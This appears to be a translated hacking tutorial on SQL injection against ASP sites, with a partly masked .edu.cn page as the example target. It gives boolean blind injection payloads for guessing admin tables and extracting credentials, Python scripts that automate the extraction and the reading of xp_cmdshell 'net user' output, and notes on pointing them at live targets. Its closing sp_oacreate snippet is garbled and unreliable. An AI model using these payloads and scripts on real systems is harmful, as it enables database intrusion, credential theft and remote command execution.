ACCESS injection:
ASP + ACCESS, by hand:
http://zsb.xxx.edu.cn/2j.asp?id=24 and 1=1 returns the normal page
http://zsb.xxx.edu.cn/2j.asp?id=24 and 1=2 returns an error
1=1 is true and 1=2 is false, so the first returns the normal page and the second an error.
If the field is a character type, the SQL statement becomes:
select * from table where field='24'
in which case submit instead:
http://zsb.xxx.edu.cn/2j.asp?id=24 and '1'='1'
http://zsb.xxx.edu.cn/2j.asp?id=24 and '1'='2'
Once the injection point is confirmed, determine whether the database is ACCESS or MSSQL by using the system tables.
The ACCESS system table is msysobjects, which cannot be read from the web environment; the SQL Server system table sysobjects can be read from the web environment. Submit the following two statements:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from sysobjects)>0
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from msysobjects)>0
If the database is SQL Server, the first page displays normally and the second returns an error; if it is ACCESS, both return errors. After I submitted these two and both returned errors, I could be sure it was an ACCESS database.
Figure 3.
Guess the table name:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from table_name)>0
If the table name exists, the page returns normally; otherwise it returns an error.
First I submitted:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from admin)>0
which returned an error, indicating that the admin table does not exist. The next submission returned normally:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(*) from article_admin)>0
Then I submitted:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(username) from article_admin)>0
which returned normally, and then:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count(password) from article_admin)>0
which also returned normally, indicating that the two fields username and password exist.
Guess the user name and password length:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select top 1 len(username) from article_admin)=5
returns normally, indicating that the username content is 5 characters long.
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select top 1 len(password) from article_admin)=16
returns normally: the password content is 16 characters long, which is the length of a 16-character MD5 hash.
Guess the contents of the user name and password:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select top 1 asc(mid(username,1,1)) from article_admin)=97
returns normally, indicating that the ASCII code of the first character of the first username is 97, which is the letter a.
To guess the second character of the username, change mid(username,1,1) to mid(username,2,1), and so on.
Guess the password the same way, replacing username with password, and you are done.
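The whole ACCESS procedure above (true/false probe, table and column existence, length, then one character at a time) is a boolean-based blind injection, and the character guessing generalises from "try =97" to a binary search over the oracle. The script below is an added example, not code from the original post; the target site, the `article` and `article_admin` tables and the admin row are constructed sample data held in an in-memory SQLite database that stands in for the ASP page. Because SQLite is what runs offline, the probes executed here use its `length`/`unicode(substr())`/`limit 1` forms; the `access` templates carry the page's own `top 1`/`len`/`asc(mid())` syntax and are what you would select against a real Jet backend.

```python
import sqlite3

# Constructed sample data standing in for the target site's tables; the
# password value is an arbitrary 16-character hex string, not a real hash.
_db = sqlite3.connect(":memory:")
_db.executescript("""
create table article (id integer, title text);
insert into article values (24, 'sample article');
create table article_admin (username text, password text);
insert into article_admin values ('admin', '7bbd73250516f069');
""")


def vulnerable_page(id_value):
    """Stand-in for 2j.asp: the id parameter is concatenated straight into the
    query. Returns True for the 'normal' page (a row came back) and False for
    the error page (no row, or a SQL error such as a missing table)."""
    try:
        rows = _db.execute("select * from article where id=" + id_value).fetchall()
        return len(rows) > 0
    except sqlite3.Error:
        return False


def oracle(condition, fetch=vulnerable_page):
    """Ask the page one true/false question, exactly as the manual guessing does."""
    return fetch("24 and " + condition)


# Payload templates. The 'access' entries are the Jet/ASP syntax used in the
# text (top 1, len, asc(mid())); the 'sqlite' entries are the equivalents the
# offline stand-in understands.
TEMPLATES = {
    "access": {
        "len": "(select top 1 len({column}) from {table})",
        "chr": "(select top 1 asc(mid({column},{pos},1)) from {table})",
    },
    "sqlite": {
        "len": "(select length({column}) from {table} limit 1)",
        "chr": "(select unicode(substr({column},{pos},1)) from {table} limit 1)",
    },
}


def bisect_value(greater_than, lo, hi):
    """Find the integer v in [lo, hi] using only an oracle answering 'v > x'.
    Each probe halves the range: about 7 requests per character instead of up to 95."""
    while lo < hi:
        mid = (lo + hi) // 2
        if greater_than(mid):
            lo = mid + 1
        else:
            hi = mid
    return lo


def table_exists(table, fetch=vulnerable_page):
    """The text's '(select count(*) from T)>0' probe: error page means no such table."""
    return oracle("(select count(*) from %s)>0" % table, fetch)


def column_exists(table, column, fetch=vulnerable_page):
    """The text's '(select count(col) from T)>0' probe."""
    return oracle("(select count(%s) from %s)>0" % (column, table), fetch)


def extract_field(table, column, dialect="sqlite", fetch=vulnerable_page, max_len=64):
    """Recover the first row's value of table.column: first its length, then
    each character's code, both by binary search over the boolean oracle."""
    t = TEMPLATES[dialect]
    len_expr = t["len"].format(table=table, column=column)
    length = bisect_value(lambda n: oracle("%s>%d" % (len_expr, n), fetch), 0, max_len)
    chars = []
    for pos in range(1, length + 1):
        chr_expr = t["chr"].format(table=table, column=column, pos=pos)
        # printable ASCII only; widen the range if the target stores other bytes
        code = bisect_value(lambda n: oracle("%s>%d" % (chr_expr, n), fetch), 32, 126)
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    print("admin table:", table_exists("admin"), "article_admin:", table_exists("article_admin"))
    print(extract_field("article_admin", "username"), extract_field("article_admin", "password"))
```

Against a live target, replace `fetch` with a function that requests the URL with the payload in the `id` parameter and returns True when the normal page comes back; everything else stays the same, and `dialect="access"` switches the probes to the syntax shown in the text.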
MSSQL injection: 1. Showing the echo of command execution
When injecting with sa permissions, not being able to see the command echo is quite a painful thing, although Little Bamboo's NBSI also has an interesting way of getting the return, so why bother trying? Oh well.
Now I will describe a way to see the echo perfectly; I do not know which way brother Bamboo uses.
Create a table
Statement: http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000));--
Returns: normal page. The table was created successfully. Continue!
Statement: http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_cmdshell 'net user';--
Returns: normal page. The data should have been written into dirs normally.
Statement: http://www.xxxxx.com/down/list.asp?id=1 and 0<(select top 1 paths from dirs);--
Returns: Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value '***' to a column of data type int.
^_^ So we can see the echoed result. Of course, reading the table contents directly with NBSI is faster and more brutal.
Similarly, other extended stored procedures can be used to retrieve content this way, such as xp_regread (not tested).
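The three statements above only ever show the first row of dirs, because `select top 1 paths from dirs` has no ordering and no way to ask for the next row. The script below is an added example, not code from the original post: it keeps the page's error-based echo trick but gives dirs an identity column so the rows can be walked in order, and it parses the value out of the 80040e07 message. The target, the `WEBSRV` host name and the `net user` lines are constructed sample data; `simulated_page` is a stand-in for list.asp, and a real `fetch(payload)` that appends the payload to the vulnerable URL and returns the response body can be passed in its place.

```python
import re

# The statements the text submits through the injection point, with one
# change: an identity column on dirs so rows beyond the first can be read
# (the text's 'select top 1 paths from dirs' only ever returns one row).
SETUP_STATEMENTS = [
    "create table dirs(id int identity(1,1), paths varchar(1000))",
    "insert dirs(paths) exec master.dbo.xp_cmdshell 'net user'",
]

# SQL Server's type-conversion error carries the varchar value verbatim.
ERROR_RE = re.compile(r"converting the varchar value '(.*?)' to a column of data type int")

# Constructed stand-in for the rows xp_cmdshell 'net user' would have written
# into dirs on the target; not output captured from any real host.
_DIRS_ROWS = [
    "User accounts for \\\\WEBSRV",
    "-------------------------------------------------------------------------------",
    "Administrator            Guest                    IUSR_WEBSRV",
    "The command completed successfully.",
]


def row_payload(n):
    """Forces the n-th varchar row into an int comparison so the error echoes it."""
    return " and 0<(select paths from dirs where id=%d)--" % n


def simulated_page(payload):
    """Stand-in for list.asp?id=1<payload> on MSSQL: a request for an existing
    dirs row yields the 80040e07 conversion error, anything else the normal page."""
    m = re.search(r"where id=(\d+)", payload)
    if m and 1 <= int(m.group(1)) <= len(_DIRS_ROWS):
        value = _DIRS_ROWS[int(m.group(1)) - 1]
        return ("Microsoft OLE DB Provider for SQL Server error '80040e07' "
                "Syntax error converting the varchar value '%s' to a column of data type int." % value)
    return "<html>normal page</html>"


def read_dirs(fetch=simulated_page, max_rows=1000):
    """Walk dirs row by row until a request comes back without the error,
    returning the echoed command output in order."""
    rows = []
    for n in range(1, max_rows + 1):
        m = ERROR_RE.search(fetch(row_payload(n)))
        if not m:
            break
        rows.append(m.group(1))
    return rows


if __name__ == "__main__":
    for line in read_dirs():
        print(line)
```

Each row costs one request, and the loop stops at the first row number that produces the normal page, so `max_rows` is only a safety cap. Drop the table with `drop table dirs` when finished, since it is left behind on the target otherwise.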
2. The xp_dirtree directory listing problem
NBSI's directory listing tool is not reliable; sometimes the listing does not finish. When it really does not come out, you can just query the temporary table (the default is NB_TreeList_Tmp) directly to see the contents.
3. Vulnerability detection
NBSI's vulnerability detection is poor: for some numeric-type injection points it refuses to test at all, not to mention quote types where the quotes are filtered, so manual testing is recommended to be safe (:P)
4. xpsql70.dll and xp_cmdshell have been deleted and you cannot upload to solve the problem
Big brother czy actually said this a long time ago,
and I remember lzy seems to have said it too,
although this one seems not quite the same:
declare @s int
exec sp_oacreate ; c:\a.txt
This is executed in Query Analyzer; in the address bar it should be executed like this:
declare @s int; exec sp_oacreate
Not tested via an injection point.